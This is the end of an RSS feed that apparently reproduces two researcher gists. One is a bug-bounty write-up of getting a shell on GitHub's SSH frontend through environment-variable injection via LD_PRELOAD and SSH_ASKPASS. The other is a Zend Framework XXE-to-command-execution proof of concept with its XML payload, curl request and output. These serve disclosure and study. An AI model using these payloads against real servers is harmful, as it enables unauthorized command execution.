      <description>&lt;p&gt;&lt;a href=&#34;https://gist.github.com/joernchen/a7c031b6b8df5d5d0b61&#34;&gt;Original gist&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;GitHub RCE by Environment variable injection Bug Bounty writeup&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Disclaimer: I&amp;#39;ll keep this really short but  I hope you&amp;#39;ll get the key points.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;GitHub blogged a while ago about some internal tool called gerve:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;https://github.com/blog/530-how-we-made-github-fast&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Upon git+sshing to github.com gerve basically looks up your permission&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;on the repo you want to interact with. Then it bounces you further in&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;another forced SSH session to the back end where the repo actually is.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;At some point I figured that it is possible to inject some environment&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;variables into gerve/the forked SSH process by setting my username to&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;something like &amp;#34;joerchen\n\nLD_ASSUME_KERNEL=1\n\n&amp;#34;.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;LD_ASSUME_KERNEL=1 will prevent the actual command from being run, just&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;like this:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;---&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;joernchen ~ $ LD_ASSUME_KERNEL=1 uname -a&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;uname: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;---&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;For the details on this, check man 8 ld.so.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;So far so good, how can we use this fact to make SSH execute arbitrary&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;commands?&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;The technique I came up with used both features of ld.so and SSH itself:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;LD_PRELOAD=/path/to/libfakeroot.so&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;SSH_ASKPASS=/usr/bin/ex&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;DISPLAY=:1&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;How and why did this work?&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1.) libfakeroot makes SSH think it&amp;#39;s root (we can inject this via&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    LD_PRELOAD because the ssh binary is not setuid)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;2.) ssh tries to read /root/.ssh/known_hosts&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;3.) ssh fails reading &amp;#39;cause it&amp;#39;s actually running as the git user&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;4.) ssh connects to $backend and wants to ask the user if&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    $backend_hostkey is OK.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5.) ssh has no terminal and DISPLAY is set&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;6.) ssh invokes the command specified in SSH_ASKPASS&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;From being dropped in /usr/bin/ex we could just say:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;!/bin/sh&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;and be happy with having a shell as git@github.com&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
    </item>
    <item>
      <title>XXE to RCE</title>
      <link>https://0day.click/recipe/2012-09-04-xxe-to-rce/</link>
      <pubDate>Tue, 04 Sep 2012 19:34:31 +0200</pubDate>
      <guid>https://0day.click/recipe/2012-09-04-xxe-to-rce/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://gist.github.com/joernchen/3623896&#34;&gt;Original gist&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;into a Remote Command Execution:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;NOTE: It relies on the PHP expect module being loaded&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;(see http://de.php.net/manual/en/book.expect.php)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;joern@vbox-1:/tmp$ cat /var/www/server.php&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;?&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    require_once(&amp;#34;/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php&amp;#34;);&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    Zend_Loader_Autoloader::getInstance();&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    $server = new Zend_XmlRpc_Server();&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    echo $server-&amp;gt;handle();&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;?&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;joern@vbox-1:/tmp$ cat payload&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;!DOCTYPE root [&amp;lt;!ENTITY foo SYSTEM &amp;#34;expect://id&amp;#34;&amp;gt;]&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;methodCall&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;lt;methodName&amp;gt;&amp;amp;foo;&amp;lt;/methodName&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;/methodCall&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;methodResponse&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;lt;fault&amp;gt;&amp;lt;value&amp;gt;&amp;lt;struct&amp;gt;&amp;lt;member&amp;gt;&amp;lt;name&amp;gt;faultCode&amp;lt;/name&amp;gt;&amp;lt;value&amp;gt;&amp;lt;int&amp;gt;620&amp;lt;/int&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/member&amp;gt;&amp;lt;member&amp;gt;&amp;lt;name&amp;gt;faultString&amp;lt;/name&amp;gt;&amp;lt;value&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;string&amp;gt;Method &amp;amp;quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;amp;quot; does not exist&amp;lt;/string&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;/value&amp;gt;&amp;lt;/member&amp;gt;&amp;lt;/struct&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/fault&amp;gt;&amp;lt;/methodResponse&amp;gt;joern@vbox-1:/tmp$&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
    </item>
  </channel>
</rss>
